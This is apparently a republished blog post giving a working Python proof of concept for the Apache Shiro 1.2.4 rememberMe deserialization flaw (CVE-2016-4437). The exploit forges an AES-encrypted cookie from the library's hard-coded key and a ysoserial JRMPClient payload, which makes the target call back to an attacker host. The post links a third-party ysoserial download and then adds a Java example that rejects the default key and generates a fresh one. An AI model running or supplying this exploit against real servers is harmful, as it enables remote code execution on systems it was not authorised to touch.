Hands-on Apache Shiro 1.2.4 RCE

Posted by peterpan0707007


Editor's note: this article was compiled by the cha138.com editorial team and covers hands-on exploitation of the Apache Shiro 1.2.4 RCE; we hope it is of some reference value.

PoC:

#coding: utf-8
# The original post's PoC; string quotes lost during extraction have been restored.
import os
import re
import sys
import base64
import uuid
import subprocess
import requests
from Crypto.Cipher import AES

# ysoserial.jar is expected in the current working directory
JAR_FILE = "ysoserial.jar"

def attack(target, command):
    if not os.path.exists(JAR_FILE):
        raise Exception("jar file not found!")
    # ysoserial's JRMPClient payload, written to stdout as a serialized Java object
    popen = subprocess.Popen(["java", "-jar", JAR_FILE, "JRMPClient", command],
                             stdout=subprocess.PIPE)
    # PKCS#7 padding to the AES block size (16 bytes)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Hard-coded default RememberMe cipher key shipped with Shiro 1.2.4 (CVE-2016-4437)
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # Cookie format Shiro expects: base64(IV || AES-CBC ciphertext)
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    print(base64_ciphertext)
    try:
        response = requests.get(target, timeout=20, cookies={"rememberMe": base64_ciphertext.decode()})
        print("Request to target URL success")
    except Exception as e:
        print("[x] Request to target URL fail! {}".format(e))

if __name__ == "__main__":
    url = sys.argv[1]
    # "attackIP:1234" is the placeholder host:port from the original post
    attack(url, "attackIP:1234")

ysoserial.jar must be present in the current directory; download link: https://pan.baidu.com/s/1gdevU9QyguGSYr2ExBChqQ  password: nsoi
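The PoC above works only because Shiro 1.2.4 encrypts the rememberMe cookie with a cipher key that is hard-coded in the library, so anyone can forge a cookie that deserializes on the server. The fix is to upgrade past 1.2.4 and to configure a per-deployment key that is never the published default. The following is an added example written for this page (not code from the original post or from the Shiro project); it assumes the key is supplied through an environment variable named SHIRO_REMEMBERME_KEY (a name chosen here) as a base64-encoded AES key, refuses the 1.2.4 default, and wires the manager into a DefaultWebSecurityManager.

```java
import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;

// Added example: harden Shiro's RememberMe cookie key instead of relying on the
// library default. Environment variable name SHIRO_REMEMBERME_KEY is an assumption.
public class RememberMeKeyHardening {

    // The key Shiro 1.2.4 ships with (the one the PoC uses); kept only to reject it.
    private static final String SHIRO_124_DEFAULT_KEY = "kPH+bIxk5D2deZiIxcaaaA==";

    /** Builds a CookieRememberMeManager with an operator-supplied AES key. */
    public static CookieRememberMeManager buildRememberMeManager(String base64Key) {
        if (base64Key == null || base64Key.isEmpty()) {
            // Fail closed: never let the library fall back to a built-in key.
            throw new IllegalStateException(
                "SHIRO_REMEMBERME_KEY is not set; refusing to start with a default cipher key");
        }
        if (SHIRO_124_DEFAULT_KEY.equals(base64Key)) {
            throw new IllegalStateException("the Shiro 1.2.4 default cipher key is not allowed");
        }
        byte[] key = Base64.decode(base64Key);
        if (key.length != 16 && key.length != 24 && key.length != 32) {
            throw new IllegalStateException("cipher key must be 128, 192 or 256 bits");
        }
        CookieRememberMeManager mgr = new CookieRememberMeManager();
        mgr.setCipherKey(key);   // overrides the library default
        return mgr;
    }

    /** Generates a fresh random key, base64-encoded, for the deployment's secret store. */
    public static String generateKey() {
        AesCipherService aes = new AesCipherService();
        return Base64.encodeToString(aes.generateNewKey().getEncoded());
    }

    public static void main(String[] args) {
        if (args.length > 0 && "generate".equals(args[0])) {
            // One-off: print a new key for the operator to place in SHIRO_REMEMBERME_KEY
            System.out.println(generateKey());
            return;
        }
        DefaultWebSecurityManager securityManager = new DefaultWebSecurityManager();
        securityManager.setRememberMeManager(
            buildRememberMeManager(System.getenv("SHIRO_REMEMBERME_KEY")));
        System.out.println("rememberMe configured with a non-default cipher key");
    }
}
```

Run it once with the argument generate to obtain a key, store that value outside the code base, and start the application with it set; if the variable is missing or equals the published default, startup aborts rather than silently using a key that every copy of the PoC above already knows.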

Screenshots from the live run:

[screenshot omitted]

The above is the main content of "Hands-on Apache Shiro 1.2.4 RCE". If it did not solve your problem, refer to the following articles:

Apache Shiro 1.2.4 deserialization vulnerability (CVE-2016-4437) reproduction

Java -- Apache Shiro deserialization RCE -- CVE-2016-4437

Shiro RememberMe 1.2.4 deserialization command-execution vulnerability reproduction

Apache Shiro 1.2.4 deserialization vulnerability (CVE-2016-4437)